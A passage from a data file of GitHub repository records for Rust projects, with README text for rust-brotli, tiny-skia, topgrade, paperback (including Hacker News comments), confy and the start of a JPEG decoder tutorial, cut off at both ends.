https://doc.rust-lang.org/cargo/commands/cargo-bench.html\n[cargo-fuzz]: https://github.com/rust-fuzz/cargo-fuzz\n[libfuzzer]: https://llvm.org/docs/LibFuzzer.html\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dropbox/rust-brotli", "link": "https://github.com/dropbox/rust-brotli", "tags": ["decompression", "brotli", "rust", "brotli-decompressor", "rustlang", "safe", "brotli-compression", "brotli-encoder", "brotli-compressor", "compression", "compressor"], "stars": 673, "description": "Brotli compressor and decompressor written in rust that optionally avoids the stdlib", "lang": "Rust", "repo_lang": "", "readme": "# rust-brotli\n\n[![crates.io](https://img.shields.io/crates/v/brotli.svg)](https://crates.io/crates/brotli)\n[![Build Status](https://travis-ci.org/dropbox/rust-brotli.svg?branch=master)](https://travis-ci.org/dropbox/rust-brotli)\n\n\n## What's new in 3.2\n* into_inner conversions for both Reader and Writer classes\n\n## What's new in 3.0\n* A fully compatible FFI for drop-in compatibiltiy with the https://github.com/google/brotli binaries\n * custom allocators fully supported\n* Multithreaded compression so multiple threads can operate in unison on a single file\n* Concatenatability mode to add the feature requested in https://github.com/google/brotli/issues/628\n * binary tool catbrotli can accomplish this if the first file was specified with -apendable and the second with -catable\n* validation mode where a file is double-checked to be able to be decompressed with the same settings; useful for benchmarking or fuzzing\n* Magic Number: where the brotli file can have a useful header with a few magic bytes, concatability info and a final output size for pre-allocating memory\n\n## What's new in 2.5\n* In 2.5 The callback also passes down an allocator to make new StaticCommands and PDFs and 256 bit floating point vectors.\n* In 2.4 The callback with the compression intermediate representation now passes a full metablock at a time. Also these items are mutable\nin case futher optimization is desired\n\n## What's new in 2.3\n\n* Flush now produces output instead of calling finish on the stream. This allows you to use the writer abstraction to\nget immediate output without having to resort to the CompressStream internal abstraction\n\n## Project Requirements\n\nDirect no-stdlib port of the C brotli compressor to Rust\n\nno dependency on the Rust stdlib: this library would be ideal for decompressing within a rust kernel among other things.\n\nThis is useful to see how C and Rust compare in an apples-to-apples\ncomparison where the same algorithms and data structures and\noptimizations are employed.\n\n## Compression Usage\n\nRust brotli currently supports compression levels 0 - 11\nThey should be bitwise identical to the brotli C compression engine at compression levels 0-9\nRecommended lg_window_size is between 20 and 22\n\n### With the io::Read abstraction\n```rust\nlet mut input = brotli::CompressorReader::new(&mut io::stdin(), 4096 /* buffer size */,\n quality as u32, lg_window_size as u32);\n```\nthen you can simply read input as you would any other io::Read class\n\n### With the io::Write abstraction\n\n```rust\nlet mut writer = brotli::Compressor::new(&mut io::stdout(), 4096 /* buffer size */,\n quality as u32, lg_window_size as u32);\n```\n\nThere are also methods to build Compressor Readers or Writers using the with_params static function\n\neg:\n```rust\nlet params = BrotliEncoderParams::default();\n// modify params to fit the application needs\nlet mut writer = brotli::Compressor::with_params(&mut io::stdout(), 4096 /* buffer size */,\n params);\n```\nor for the reader\n```rust\nlet params = BrotliEncoderParams::default();\n// modify params to fit the application needs\nlet mut writer = brotli::CompressorReader::with_params(&mut io::stdin(), 4096 /* buffer size */,\n params);\n```\n\n\n### With the Stream Copy abstraction\n\n```rust\nmatch brotli::BrotliCompress(&mut io::stdin(), &mut io::stdout(), &brotli_encoder_params) {\n Ok(_) => {},\n Err(e) => panic!(\"Error {:?}\", e),\n}\n```\n\n## Decompression Usage\n\n### With the io::Read abstraction\n\n```rust\nlet mut input = brotli::Decompressor::new(&mut io::stdin(), 4096 /* buffer size */);\n```\nthen you can simply read input as you would any other io::Read class\n\n### With the io::Write abstraction\n\n```rust\nlet mut writer = brotli::DecompressorWriter::new(&mut io::stdout(), 4096 /* buffer size */);\n```\n\n### With the Stream Copy abstraction\n\n```rust\nmatch brotli::BrotliDecompress(&mut io::stdin(), &mut io::stdout()) {\n Ok(_) => {},\n Err(e) => panic!(\"Error {:?}\", e),\n}\n```\n\n### With manual memory management\n\nThere are 3 steps to using brotli without stdlib\n\n1. setup the memory manager\n2. setup the BrotliState\n3. in a loop, call BrotliDecompressStream\n\nin Detail\n\n```rust\n// at global scope declare a MemPool type -- in this case we'll choose the heap to\n// avoid unsafe code, and avoid restrictions of the stack size\n\ndeclare_stack_allocator_struct!(MemPool, heap);\n\n// at local scope, make a heap allocated buffers to hold uint8's uint32's and huffman codes\nlet mut u8_buffer = define_allocator_memory_pool!(4096, u8, [0; 32 * 1024 * 1024], heap);\nlet mut u32_buffer = define_allocator_memory_pool!(4096, u32, [0; 1024 * 1024], heap);\nlet mut hc_buffer = define_allocator_memory_pool!(4096, HuffmanCode, [0; 4 * 1024 * 1024], heap);\nlet heap_u8_allocator = HeapPrealloc::::new_allocator(4096, &mut u8_buffer, bzero);\nlet heap_u32_allocator = HeapPrealloc::::new_allocator(4096, &mut u32_buffer, bzero);\nlet heap_hc_allocator = HeapPrealloc::::new_allocator(4096, &mut hc_buffer, bzero);\n\n// At this point no more syscalls are going to be needed since everything can come from the allocators.\n\n// Feel free to activate SECCOMP jailing or other mechanisms to secure your application if you wish.\n\n// Now it's possible to setup the decompressor state\nlet mut brotli_state = BrotliState::new(heap_u8_allocator, heap_u32_allocator, heap_hc_allocator);\n\n// at this point the decompressor simply needs an input and output buffer and the ability to track\n// the available data left in each buffer\nloop {\n result = BrotliDecompressStream(&mut available_in, &mut input_offset, &input.slice(),\n &mut available_out, &mut output_offset, &mut output.slice_mut(),\n &mut written, &mut brotli_state);\n\n // just end the decompression if result is BrotliResult::ResultSuccess or BrotliResult::ResultFailure\n}\n```\n\nThis interface is the same interface that the C brotli decompressor uses\n\nAlso feel free to use custom allocators that invoke Box directly.\nThis example illustrates a mechanism to avoid subsequent syscalls after the initial allocation\n\n## Using the C interface\n\nrust-brotli is a drop-in replacement for the official https://github.com/google/brotli C\nimplementation. That means you can use it from any place that supports that library.\nTo build rust-brotli in this manner enter the c subdirectory and run make there\n\ncd c && make\n\nthis should build c/target/release/libbrotli.so and should build the vanilla\ncommand line tool in C for compressing and decompressing any brotli file.\n\nthe libbrotli.so in c/target/release should be able to replace any other libbrotli.so\nfile, but with all the advantages of using safe rust (except in the FFI bindings)\n\nThe code also allows a wider range of options, including forcing the prediction mode\n(eg UTF8 vs signed vs MSB vs LSB) and changing the weight of the literal cost from 540\n to other values.\n\nAdditionally the CATABLE and APPENDABLE options are exposed and allow concatenation of files\ncreated in this manner.\n\nSpecifically CATABLE files can be concatenated in any order using the catbrotli tool\nand APPENDABLE files can be the first file in a sequence of catable files...\neg you can combine\nappendable.br catable1.br catable2.br catable3.br\n\nor simply\ncatable0.br catable1.br catable2.br catable3.br\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "RazrFalcon/tiny-skia", "link": "https://github.com/RazrFalcon/tiny-skia", "tags": [], "stars": 673, "description": "A tiny Skia subset ported to Rust", "lang": "Rust", "repo_lang": "", "readme": "# tiny-skia\n![Build Status](https://github.com/RazrFalcon/tiny-skia/workflows/Rust/badge.svg)\n[![Crates.io](https://img.shields.io/crates/v/tiny-skia.svg)](https://crates.io/crates/tiny-skia)\n[![Documentation](https://docs.rs/tiny-skia/badge.svg)](https://docs.rs/tiny-skia)\n[![Rust 1.51+](https://img.shields.io/badge/rust-1.51+-orange.svg)](https://www.rust-lang.org)\n\n`tiny-skia` is a tiny [Skia] subset ported to Rust.\n\nThe goal is to provide an absolute minimal, CPU only, 2D rendering library for the Rust ecosystem,\nwith a focus on a rendering quality, speed and binary size.\n\nAnd while `tiny-skia` is definitely tiny, it support all the common 2D operations\nlike: filling and stroking a shape with a solid color, gradient or pattern;\nstroke dashing; clipping; images blending; PNG load/save.\nThe main missing feature is text rendering\n(see [#1](https://github.com/RazrFalcon/tiny-skia/issues/1)).\n\n**Note:** this is not a Skia replacement and never will be. It's more of a research project.\n\n## Motivation\n\nThe main motivation behind this library is to have a small, high-quality 2D rendering\nlibrary that can be used by [resvg]. And the choice is rather limited.\nYou basically have to choose between [cairo], Qt and Skia. And all of them are\nrelatively bloated, hard to compile and distribute. Not to mention that none of them\nare written in Rust.\n\nBut if we ignore those problems and focus only on quality and speed alone,\nSkia is by far the best one.\nHowever, the main problem with Skia is that it's huge. Really huge.\nIt supports CPU and GPU rendering, multiple input and output formats (including SVG and PDF),\nvarious filters, color spaces, color types and text rendering.\nIt consists of 370 KLOC without dependencies (around 7 MLOC with dependencies)\nand requires around 4-8 GiB of disk space to be built from sources.\nAnd the final binary is 3-8 MiB big, depending on enabled features.\nNot to mention that it requires `clang` and no other compiler\nand uses an obscure build system (`gn`) which was using Python2 until recently.\n\n`tiny-skia` tries to be small, simple and easy to build.\nCurrently, it has around 14 KLOC, compiles in less than 5s on a modern CPU\nand adds around 200KiB to your binary.\n\n## Performance\n\nCurrently, `tiny-skia` is 20-100% slower than Skia on x86-64 and about 100-300% slower on ARM.\nWhich is still faster than [cairo] and [raqote] in many cases.\nSee benchmark results [here](https://razrfalcon.github.io/tiny-skia/x86_64.html).\n\nThe heart of Skia's CPU rendering is\n[SkRasterPipeline](https://github.com/google/skia/blob/master/src/opts/SkRasterPipeline_opts.h).\nAnd this is an extremely optimized piece of code.\nBut to be a bit pedantic, it's not really a C++ code. It relies on clang's\nnon-standard vector extensions, which means that it works only with clang.\nYou can actually build it with gcc/msvc, but it will simply ignore all the optimizations\nand become 15-30 *times* slower! Which makes it kinda useless.\n\nAlso note, that neither Skia or `tiny-skia` are supporting dynamic CPU detection,\nso by enabling newer instructions you're making the resulting binary non-portable.\n\nEssentially, you will get a decent performance on x86 targets by default.\nBut if you are looking for an even better performance, you should compile your application\nwith `RUSTFLAGS=\"-Ctarget-cpu=haswell\"` environment variable to enable AVX instructions.\n\nWe support ARM AArch64 NEON as well and there is no need to pass any additional flags.\n\nYou can find more information in [benches/README.md](./benches/README.md).\n\n## Rendering quality\n\nUnless there is a bug, `tiny-skia` must produce exactly the same results as Skia.\n\n## Safety\n\nWhile a quick search would shown tons of `unsafe`, the library is actually fully safe.\nAll pixels access is bound-checked. And all memory-related operations are safe.\n\nWe must use `unsafe` to call SIMD intrinsics, which is perfectly safe,\nbut Rust's std still marks them as `unsafe` because they may be missing on the target CPU.\nWe do check for that.\n\nWe also have to mark some types (to cast `[u32; 1]` to `[u8; 4]` and vise-versa) as\n[bytemuck::Pod](https://docs.rs/bytemuck/1.4.1/bytemuck/trait.Pod.html),\nwhich is an `unsafe` trait, but still is perfectly safe.\n\n## Out of scope\n\nSkia is a huge library and we support only a tiny part of.\nAnd more importantly, we do not plan to support many feature at all.\n\n- GPU rendering.\n- Text rendering (maybe someday).\n- PDF generation.\n- Non-RGBA8888 images.\n- Non-PNG image formats.\n- Advanced B\u00e9zier path operations.\n- Conic path segments.\n- Path effects (except dashing).\n- Any kind of resource caching.\n- ICC profiles.\n\n## Notable changes\n\nDespite being a port, we still have a lot of changes even in the supported subset.\n\n- No global alpha.
\n Unlike Skia, only `Pattern` is allowed to have opacity.\n In all other cases you should adjust colors opacity manually.\n- No bilinear + mipmap down-scaling support.\n- `tiny-skia` uses just a simple alpha mask for clipping, while Skia has a very complicated,\nbut way faster algorithm.\n\n## Notes about the port\n\n`tiny-skia` should be viewed as a Rust 2D rendering library that uses Skia algorithms internally.\nWe have a completely different public API. The internals are also extremely simplified.\nBut all the core logic and math is borrowed from Skia. Hence the name.\n\nAs for the porting process itself, Skia uses goto, inheritance, virtual methods, linked lists,\nconst generics and templates specialization a lot, and all of this features are unavailable in Rust.\nThere are also a lot of pointers magic, implicit mutations and caches.\nTherefore we have to compromise or even rewrite some parts from scratch.\n\n## Alternatives\n\nRight now, the only pure Rust alternative is [raqote].\n\n- It doesn't support high-quality antialiasing (hairline stroking in particular).\n- It's very slow (see [benchmarks](./benches/README.md)).\n- There are some rendering issues (like gradient transparency).\n- Raqote has a very rudimentary text rendering support, while tiny-skia has none.\n\n## License\n\nThe same as used by [Skia]: [New BSD License](./LICENSE)\n\n[Skia]: https://skia.org/\n[cairo]: https://www.cairographics.org/\n[raqote]: https://github.com/jrmuizel/raqote\n[resvg]: https://github.com/RazrFalcon/resvg\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "topgrade-rs/topgrade", "link": "https://github.com/topgrade-rs/topgrade", "tags": ["rust", "cli", "linux", "macos", "package-management", "package-manager", "unix", "windows"], "stars": 672, "description": "Upgrade all the things", "lang": "Rust", "repo_lang": "", "readme": "
\n

\n \"Topgrade\"\n

\n \n \"GitHub\n \"crates.io\"\n \"AUR\"\n \"Homebrew\"\n\n \"Demo\"\n
\n \n## Introduction\n\n> **Note**\n> This is a fork of [topgrade by r-darwish](https://github.com/r-darwish/topgrade) to keep it maintained.\n\nKeeping your system up to date usually involves invoking multiple package managers.\nThis results in big, non-portable shell one-liners saved in your shell.\nTo remedy this, **Topgrade** detects which tools you use and runs the appropriate commands to update them.\n\n## Installation\n\n[![Packaging status](https://repology.org/badge/vertical-allrepos/topgrade.svg)](https://repology.org/project/topgrade/versions)\n\n- Arch Linux: [AUR](https://aur.archlinux.org/packages/topgrade)\n- NixOS: [Nixpkgs](https://search.nixos.org/packages?show=topgrade)\n- Void Linux: [XBPS](https://voidlinux.org/packages/?arch=x86_64&q=topgrade)\n- macOS: [Homebrew](https://formulae.brew.sh/formula/topgrade) or [MacPorts](https://ports.macports.org/port/topgrade/)\n\nOther systems users can either use `cargo install` or the compiled binaries from the release page.\nThe compiled binaries contain a self-upgrading feature.\n\nTopgrade requires Rust 1.60 or above.\n\n## Usage\n\nJust run `topgrade`.\n\nVisit the documentation at [topgrade-rs.github.io](https://topgrade-rs.github.io/) for more information.\n\n> **Warning**\n> Work in Progress\n\n## Customization\n\nSee `config.example.toml` for an example configuration file.\n\n### Configuration Path\n\nThe configuration should be placed in the following paths depending on the operating system:\n\n- **Windows** - `%APPDATA%/topgrade.toml`\n- **macOS** and **other Unix systems** - `${XDG_CONFIG_HOME:-~/.config}/topgrade.toml`\n\n## Remote Execution\n\nYou can specify a key called `remote_topgrades` in the configuration file.\nThis key should contain a list of hostnames that have Topgrade installed on them.\nTopgrade will use `ssh` to run `topgrade` on remote hosts before acting locally.\nTo limit the execution only to specific hosts use the `--remote-host-limit` parameter.\n\n## Contribution\n\n### Problems or missing features?\n\nOpen a new issue describing your problem and if possible provide a solution.\n\n### Missing a feature or found an unsupported tool/distro?\n\nJust let us now what you are missing by opening an issue.\nFor tools, please open an issue describing the tool, which platforms it supports and if possible, give us an example of its usage.\n\n### Want to contribute to the code?\n\nJust fork the repository and start coding.\n\n### Contribution Guidelines\n\n- Check if your code passes `cargo fmt` and `cargo clippy`.\n- Check if your code is self explanatory, if not it should be documented by comments.\n## Roadmap\n\n- [ ] Add a proper testing framework to the code base.\n- [ ] Add unit tests for package managers.\n- [ ] Split up code into more maintainable parts, eg. putting every linux package manager in a own submodule of linux.rs.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cyphar/paperback", "link": "https://github.com/cyphar/paperback", "tags": ["paper", "backup", "shamir-secret-sharing", "secret-sharing", "encryption", "user-friendly"], "stars": 672, "description": "Paper backup generator suitable for long-term storage.", "lang": "Rust", "repo_lang": "", "readme": "## paperback ##\n\n**NOTE**: While paperback is currently fully functional, all of the development\nof \"paperpack v0\" is experimental and the format of the various data portions\nof paperback are subject to change without warning. This means that a backup\nmade today might not work with paperback tomorrow. However, once there is a\nproper release of paperback, the format of that version of paperback will be\nset in stone and any new changes will be done with a new version of paperback\n(paperback can detect the version of a document, so older documents will always\nbe handled by paperback).\n\n`paperback` is a paper-based backup scheme that is secure and easy-to-use.\nBackups are encrypted, and the secret key is split into numerous \"key shards\"\nwhich can be stored separately (by different individuals), removing the need\nfor any individual to memorise a secret passphrase.\n\nThis system can also be used as a digital will, because the original creator of\nthe backup is not required to be present (or consent to) the decryption of the\nbackup if enough of the \"key shards\" are collected. No individual knows the\nsecret key (not even you), and thus no party can be compelled to provide the\nkey without the consent of `k-1` other parties.\n\nTo make this system as simple-to-use as possible, `paperback` creates several\nPDFs which you can then print out and laminate, ready for recovery. Here are\nsome examples of the generated documents:\n\n| | Mockups | Current Status |\n| ------------- | :-------------------------------------------------------------------: | :----------------------------------------------------------------: |\n| Main Document | | |\n| Key Shard | | |\n\nThese \"key shards\" can then be given to a set of semi-trusted people.\n`paperback` also supports `(k, n)` redundancy, allowing for `n` key shards to\nbe created but only `k` being required in order for the backup to be recovered.\n\n\"Semi-trusted\" in this context means that you must be sure of the following two\nstatements about the parties you've given pieces to:\n\n1. At any time, at least `k` of the parties you've given pieces to will provide\n you with the data you gave them. This is important to consider, as human\n relationships can change over time, and your friend today may not be your\n friend tomorrow.\n\n2. At any time, no party will maliciously collude with more than `k-1` other\n parties in order to decrypt your backup information (however, if you are\n incapacitated, you could organise with the parties to cooperate only in that\n instance). Shamir called this having a group of \"mutually suspicious\n individuals with conflicting interests\". Ideally, each of the parties will be\n unaware of each other (or how many parties there are), and would only come\n forward based on pre-arranged agreements with you. In practice, a person's\n social graph is quite interconnected, so a higher level of trust is required.\n\nEach party will get a copy of their unique \"key shard\", and optionally a copy\nof the \"master document\" (though this is not necessary, and in some situations\nyou might want to store it separately so that even if the parties collude they\ncannot use the \"master key\" as they do not have the \"master document\"). We\nrecommend laminating all of the relevant documents, and printing them duplex\n(with each page containing the same page on both sides).\n\nNote that this design can be used in a more \"centralised\" fashion (for instance,\nby giving several lawyers from disparate law firms each an individual key shard,\nwith the intention to protect against attacks against an individual law firm).\nPaperback doesn't have a strong opinion on who would be good key shard holders;\nthat decision is up to you based on your own risk assessment.\n\nA full description of the cryptographic design and threat model is provided [in\nthe included design document][design].\n\n[design]: DESIGN.md\n\n### Usage ###\n\nPaperback is written in [Rust][rust]. In order to build Rust you need to have a\ncopy of [cargo][cargo]. Paperback can be built like this:\n\n\n```\n% cargo build --release\nwarning: patch for the non root package will be ignored, specify patch at the workspace root:\npackage: /home/cyphar/src/paperback/pkg/paperback-core/Cargo.toml\nworkspace: /home/cyphar/src/paperback/Cargo.toml\n Finished release [optimized] target(s) in 3m 42s\n% ./target/release/paperback ...\n```\n\nThe general usage of paperback is:\n\n * Create a backup using `paperback backup -n THRESHOLD -k SHARDS INPUT_FILE`.\n The `-n` threshold is how many shards are necessary to recover the secret\n (must be at least one), the `-k` shards is the number of shards that will be\n created (must be at least as large as the threshold). The input file is the\n path to a file containing your secret data (or `-` to read from stdin).\n\n The main document will be saved in the current directory with the name\n `main_document-xxxxxxxx.pdf` (`xxxxxxxx` being the document ID), and the key\n shards will be saved in the current directory with names resembling\n `key_shard-xxxxxxxx-hyyyyyyy.pdf` (with `hyyyyyyy` being the shard ID).\n\n * Recover a backup using `paperback recover --interactive OUTPUT_FILE`. You\n will be asked to input the main document data, followed by the shard data and\n codewords. The output file is the path to where the secret data will be\n output (or `-` to write to stdout).\n\n Note that for key shards, the QR code data will be encoded differently to\n the \"text fallback\". This is because it is more space efficient to store the\n data in base10 with QR codes. As long as you copy the entire payload (in\n either encoding), paperback will handle it correctly.\n\n Paperback will tell you how many QR codes from the main document remain to\n be scanned (they can be input in any order), as well as how many remaining\n key shards need to be scanned (along with a list of the key shards already\n scanned).\n\n * Expand a quorum using `paperback expand-shards -n SHARDS --interactive`. The\n `-n` shards number is the number of new shards to be created. You will be\n asked to input enough key shards to form a quorum.\n\n Paperback will tell you how many remaining key shards need to be scanned\n (along with a list of the key shards already scanned).\n\n The new key shards will be saved as PDF files in the same way as with\n `paperback backup`.\n\n * Re-generate key shards with a specific identifier using `paperback\n recreate-shards --interactive SHARD_ID...`. You can specify as many shard\n ids as you like. Shard ids are of the form \"haaaaaaa\" (\"h\" followed by 7\n alphanumeric characters). You can specify any arbitrary shard id.\n\n This operation is mostly intended for allowing a shard holder to recover\n their key shard (which may have been lost). Using `recreate-shards` is\n preferable because (assuming you're sure the ID you recreate is the ID of the\n shard you originally gave them) it means that they cannot trick you into\n getting new distinct shards by pretending to lose an old shard. The recreated\n shards are identical in almost every respect to the old shards (except with a\n new set of codewords), so having many copies gives you no more information\n than just one.\n\n Paperback will tell you how many remaining key shards need to be scanned\n (along with a list of the key shards already scanned).\n\n The new key shards will be saved as PDF files in the same way as with\n `paperback backup`.\n\n * Re-print an existing paperback document using `paperback reprint --[type]\n --interactive`. `--[type]` can either be `--main-document` or `--shard` and\n indicates what type of document needs to be reprinted.\n\n You will be asked to enter the data of the document you have specified. The\n new document will be saved as a PDF file in the same way as with `paperback\n backup`.\n\n When reprinting a main document, paperback will tell you how many QR codes\n from the main document remain to be scanned (they can be input in any order).\n\nNote that when inputting data in \"interactive mode\" you have to put an extra\nblank space to indicate that you've finished inputting the data for that QR\ncode. This is to allow you to break the input up over several lines.\n\nCurrently, paperback only supports \"interactive\" input. In the future, paperback\nwill be able to automatically scan the data from each QR code in an image or PDF\nversion of the documents.\n\n[rust]: https://www.rust-lang.org/\n[cargo]: https://doc.rust-lang.org/cargo/\n\n### Paper Choices and Storage ###\n\nOne of the most important things when considering using `paperback` is to keep\nin mind that the integrity of the backup is only as good as the paper you print\nit on. Most \"cheap\" copy paper contains some levels of acid (either from\nprocessing or from the lignin in wood pulp), and thus after a few years will\nbegin to yellow and become brittle.\n\nArchival paper is a grade of paper that is designed to last longer than\nordinary copy paper, and has standardised requirements for acidity levels and\nso on. The [National Archives of Australia][naa-standard] have an even more\nstringent standard for Archival paper and will certify consumer-level archival\npaper if it meets their strict requirements. Though archival paper is quite a\nbit more expensive than copy paper, you can consider it a fairly minor cost (as\nmost users won't need more than 50 sheets). If archival paper is too expensive,\ntry to find alkaline or acid-free paper (you can ask your state or local\nlibrary if they have any recommendations).\n\nIn addition, while using **hot** lamination on a piece of paper may make the\ndocument more resistant to spills and everyday damage, [the lamination process\ncan cause documents to deteriorate faster][anthropology-lamination] due to the\nmaterial most lamination pouches are made from (not to mention that the process\nis fairly hard to reverse). Encapsulation is a process similar to lamination,\nexcept that the laminate is usually made of more inert materials like BoPET\n(Mylar) and only the edges are sealed with tape or thread (allowing the\ndocument to be removed). Archival-grade polyester sleeves are more expensive\nthan lamination pouches, though they are not generally prohibitively expensive\n(you can find ~AU$1 sleeves online).\n\nThe required lifetime of a `paperback` backup is entirely up to the user, and so\nmaking the right price-versus-longevity tradeoff is fairly personal. However, if\nyou would like your backups to last indefinitely, I would recommend looking at\nthe [National Archives of Australia's website][naa-preserving-paper] which\ndocuments in quite some detail what common mistakes are made when trying to\npreserve paper documents.\n\nIt is recommended that you explain some of the best practices of storing\nbackups to the people you've given shard backups to -- as they are the people\nwho are in charge of keeping your backups safe and intact.\n\nFor even more recommendations (from archivists) about how best to produce and\nstore paper documents, the Canadian Conservation Institute [has publicly\nprovided very detailed explanations of their best practice\nrecommendations][cci-notes]. Unfortunately, there aren't as many details given\nabout what a *producer* of a document should do.\n\n[naa-standard]: https://web.archive.org/web/20180304061138/https://www.naa.gov.au/information-management/managing-information-and-records/preserving/physical-records-pres/archival-quality-paper-products.aspx\n[anthropology-lamination]: https://web.archive.org/web/20181128202230/http://anthropology.si.edu/conservation/lamination/lamination_guidelines.htm\n[naa-preserving-paper]: https://web.archive.org/web/20180324131805/http://www.naa.gov.au/information-management/managing-information-and-records/preserving/artworks.aspx\n[cci-notes]: https://www.canada.ca/en/conservation-institute/services/conservation-preservation-publications/canadian-conservation-institute-notes.html\n\n### License ###\n\n`paperback` is licensed under the terms of the GNU GPLv3+.\n\n```\npaperback: resilient paper backups for the very paranoid\nCopyright (C) 2018-2022 Aleksa Sarai \n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see .\n```\n", "readme_type": "markdown", "hn_comments": "It would be really cool if a small decoding binary could be printed on the back as a massive QR code. Then the paper would be all you'd need to recover the original document.Surely there's a better medium for long-term storage than paper? I can see this working for small documents, but if you have to print out thousands of pages you mine as well store the data on some kind of USB and maybe just print out the key shards.It's a thousand pages, give or take a few.\nI'll be writing more in a week or two.\nI could make it longer if you like the style.\nI can change it 'round,\nAnd I want to be a paperback writer,\nPaperback writerSome documentation about how to go about decoding and inputting a document should be done.... I still haven't figured out how to do this after spending some time first trying to get it build (didn't build on debian stable, needed a debian testing chroot).Now I can get the base64-strings from the qr-codes, but it's not clear how to pass this to paperback to decode the main document.Seems like a nice physical backup for a password manager exportThe image of an example document says something like \u201cTo recover the content, download the latest version of paperback from \u201c.I have a few questions about that.1. Would that link even work after 10 or 20 or 30 years? What\u2019s the fallback if the link is broken?2. Is the \u201clatest version\u201d always guaranteed to be compatible with the scheme used by the document in question (again consider that the document is created now but is being attempted to be recovered a few decades from now)?3. Based on the above questions, what\u2019s a reasonable expected age for this system to work (I\u2019m referring to the software)?It would be useful to have these questions and their answers added in an FAQ on the site and in the repo.The problem is that QR codes are not information dense enough to encode large amounts of data efficiently. I have been trying to build something similar to this and using various encoding methods. So far, I have trouble getting more than about 64k on a printed page such that it can be optically recognized. The number of symbols in your encoding alphabet is important, and this reduces recognition.I like this project and gives me some ideas on how to enhance my solution.\nThank you!One use case it is you can share different number of key shard to individuals. Thus, they have more \"power\" based on how much you trust them.If this is your will, you can give 3 shards to your sister (that you trust absolutely) and requires 4 shards to decrypt it. Your \"semi-trusted\" friends needs to be 4 to decrypt it, but your sister only needs to know one of your friend to access.Written in rust for extra HN creds /s", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rust-cli/confy", "link": "https://github.com/rust-cli/confy", "tags": ["configuration", "cli"], "stars": 670, "description": "\ud83d\udecb Zero-boilerplate configuration management in Rust ", "lang": "Rust", "repo_lang": "", "readme": "# confy\n\n[![crates.io](https://img.shields.io/crates/v/confy)](https://crates.io/crates/confy)\n[![docs.rs](https://img.shields.io/docsrs/confy)](https://docs.rs/confy/)\n[![Discord](https://img.shields.io/badge/chat-Discord-informational)](https://discord.gg/dwq4Zme)\n\nZero-boilerplate configuration management.\n\nFocus on storing the right data, instead of worrying about how or where to store it.\n\n```rust\nuse serde_derive::{Serialize, Deserialize};\n\n#[derive(Default, Debug, Serialize, Deserialize)]\nstruct MyConfig {\n version: u8,\n api_key: String,\n}\n\nfn main() -> Result<(), ::std::io::Error> {\n let cfg: MyConfig = confy::load(\"my-app-name\", None)?;\n dbg!(cfg);\n Ok(())\n}\n```\n\n## Confy's feature flags\nConfy can be used with either `TOML`, `YAML`, or `RON` files.\n`TOML` is the default language used with confy but any of the other languages can be used by enabling them with feature flags as shown below.\n\nNote: you can only use __one__ of these features at a time, so in order to use either of the optional features you have to disable default features.\n\n### Using yaml\nTo use YAML files with confy you have to make sure you have enabled the `yaml_conf` feature and disabled both `toml_conf` and `ron_conf`.\n\nEnable the feature in `Cargo.toml`:\n```toml\n[dependencies.confy]\nfeatures = [\"yaml_conf\"]\ndefault-features = false\n```\n\n### Using ron\nFor using RON files with confy you have to make sure you have enabled the `ron_conf` feature and disabled both `toml_conf` and `yaml_conf`.\n\nEnable the feature in `Cargo.toml`:\n```toml\n[dependencies.confy]\nfeatures = [\"ron_conf\"]\ndefault-features = false\n```\n\n## Changing error messages\nInformation about adding context to error messages can be found at [Providing Context](https://rust-cli.github.io/book/tutorial/errors.html#providing-context)\n\n## Breaking changes\n### Version 0.5.0\n* The base functions `load` and `store` have been added an optional parameter in the event multiples configurations are needed, or ones with different filename.\n* The default configuration file is now named \"default-config\" instead of using the application's name. Put the second argument of `load` and `store` to be the same of the first one to keep the previous configuration file.\n* It is now possible to save the configuration as toml or as yaml. The configuration's file name's extension depends on the format used.\n\n### Version 0.4.0\nStarting with version 0.4.0 the configuration file are stored in the expected place for your system. See the [`directories`] crates for more information.\nBefore version 0.4.0, the configuration file was written in the current directory.\n\n[`directories`]: https://crates.io/crates/directories\n[`directories-next`]: https://crates.io/crates/directories-next\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MROS/jpeg_tutorial", "link": "https://github.com/MROS/jpeg_tutorial", "tags": ["jpeg", "decoder", "rust"], "stars": 667, "description": "\u8ddf\u6211\u5beb JPEG \u89e3\u78bc\u5668 (Write a JPEG decoder with me)", "lang": "Rust", "repo_lang": "", "readme": "# Follow me to write a JPEG decoder\n\n## origin\nI used C++ to write a [JPEG decoder](https://github.com/MROS/jpeg_decoder) a few years ago. I still remember that the introduction to the JPEG format on the Internet at that time was messy, lacking things, and the standard book is Be complete and rigorous, the writing is stinky and long. Is there no way for me to finish my homework quickly? Finally, I found a python-written decoder on github. By tracking this code, I managed to understand the unclear parts of the online articles.\n\nWhen I was writing this article, I searched for articles on the Internet again, and found that several good articles have indeed appeared in the past few years, but if I continue to dig deeper, I will find that the Chinese articles explaining JPEG are always the same. It is from this [JPEG image decoding scheme] (http://read.pudn.com/downloads166/ebook/757412/jpeg/JPEG%CD%BC%CF%F1%BD%E2%C2%EB%B7% BD%B0%B8.pdf), the depth of theory and the clarity of discussion are slightly insufficient, so try to challenge and see if you can explain JPEG more clearly in your own way. However, some predecessors' examples are very good, and they will continue to be used after indicating the source.\n\nThe purpose of this article is: **I hope that readers can create their own JPEG decoder as soon as possible as long as they follow the steps of this article**. In addition, in the process of implementing the JPEG decoder again while writing this article, I will implement some small tools that can assist in debugging, and open source them for readers to use. The source code of the decoder will also be kept as readable as possible. available for direct reference by readers.\n\nIf I still have 